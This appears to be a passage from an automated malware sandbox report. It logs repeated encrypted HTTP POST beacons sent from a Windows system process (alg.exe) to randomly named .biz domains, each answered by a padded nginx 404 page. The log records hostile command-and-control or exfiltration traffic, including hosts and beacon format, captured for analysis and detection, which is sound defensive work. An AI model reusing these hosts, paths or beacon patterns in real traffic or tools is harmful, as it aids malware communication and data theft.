                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.114195108 CET356OUTPOST /hrtvnxyfpkjy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.114228010 CET778OUTData Raw: 9b 15 f5 1c 45 20 f6 ee fe 02 00 00 67 f3 ec 29 60 87 74 15 f0 8d 67 12 b6 36 40 2e 24 10 8b 06 37 d9 59 aa e8 fe 1e f2 b2 c7 be 32 1e 0e 2d 0d 8e 60 99 59 17 77 c0 89 dc 91 9a d2 b6 f5 70 33 98 cc 16 30 f1 ea 32 98 fe 76 1e 16 11 f3 c0 97 3c 90
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: E g)`tg6@.$7Y2-`Ywp302v<lZ]b$cYBZv3+>hrCS8mX8vsu5;Y<d|H"Ch=a9[ysjH6CzMs;^v4bK-:<W
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.261414051 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.995723009 CET353OUTPOST /dovasmbpdb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.995769978 CET778OUTData Raw: 02 4a 39 47 fc f5 b0 bc fe 02 00 00 de 9a e9 ff f3 7a a0 49 28 5a 09 42 09 b1 25 53 22 fb 02 66 34 7d dc 6e 06 73 a9 e8 4d b5 db 2c ee 63 58 95 c4 f2 d1 83 a3 83 b7 14 51 da bf 33 cb cc 45 f4 89 40 67 14 1d fb cf 34 6d 16 3c 37 18 b6 c8 05 a1 85
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: J9GzI(ZB%S"f4}nsM,cXQ3E@g4m<7gPw96^D`_|UK:WTn;y|)/7F_V`Nzr0o[ t0 v|!T9In^r2NpA^_f:yc^cP[#y(N\5d;UX
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.143939018 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.414597988 CET357OUTPOST /arqypullvoovtl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.414647102 CET778OUTData Raw: 64 5d 32 25 ea ed 5e 4e fe 02 00 00 61 a3 2b 8f 7f ba d7 77 ee b5 0c b4 36 5c 4c c8 88 9d 38 e8 1a 8d 3b 35 68 ce a0 20 81 34 ef e2 92 f1 d9 23 37 5f db b7 9c d8 92 d1 99 b8 79 a1 1b 72 9b 73 28 ef c9 0b 29 68 fd 96 6d 29 9d 52 9d 2f 70 c7 2a fb
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: d]2%^Na+w6\L8;5h 4#7_yrs()hm)R/p*m?&]1$S`G>P=Ul>lKbt'kZ=9ETLJ=(&^E!V%g"~GB4wcJ?El:N!lal+q]
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.560302973 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.850526094 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.645169020 CET358OUTPOST /cftycvbqsjsfc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.645198107 CET778OUTData Raw: 2c 57 41 34 76 d1 0a 73 fe 02 00 00 1b e6 57 f9 78 8b 57 46 4b 7e 48 ce 66 d3 95 f2 28 48 13 96 02 8b e2 3b e4 b1 b9 3f 12 92 2c eb a8 81 95 29 b9 ab a0 22 7c 29 ce 25 ac 25 e4 bd da a4 9d 05 c1 b5 d2 79 23 b5 aa 3b ad 50 f6 87 e1 5e 1f 84 c9 e3
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ,WA4vsWxWFK~Hf(H;?,)"|)%%y#;P^A!x|q?KE(<xHVS+{rg>vRp<uK[xiT6o7Xu>%Q9t4ly`kWmd:#FG{mTl7::)-'o,
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.791265011 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.794641972 CET356OUTPOST /klbxxtxcjep HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.794708014 CET778OUTData Raw: 2a 26 3c c9 e8 ab b1 a4 fe 02 00 00 2e 78 30 27 ac ef d5 9c d1 05 86 9a 96 f3 b0 3b 94 e1 f2 52 01 2b 5a 1c 95 01 2e bf f4 a4 bd 20 41 39 f1 10 07 be 49 26 d2 1a 11 51 33 ac fd d8 3b e9 f5 28 3f 9f f2 08 67 dc 6f 3b 32 6b 72 e9 9b 44 5b c4 2a a7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: *&<.x0';R+Z. A9I&Q3;(?go;2krD[*,!AgRWA!4ebc&9-4JBIO\zfllz?fM{H|kitS#/C;xJv((UDmUi*&?i4o~
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.940088987 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.229429960 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  24192.168.2.54998813.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.524434090 CET345OUTPOST /vvo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
